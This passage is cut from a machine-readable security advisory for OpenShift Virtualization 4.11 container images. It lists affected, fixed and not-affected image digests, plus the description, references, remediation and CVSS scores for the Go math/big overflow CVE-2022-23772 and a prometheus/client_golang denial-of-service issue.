"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", 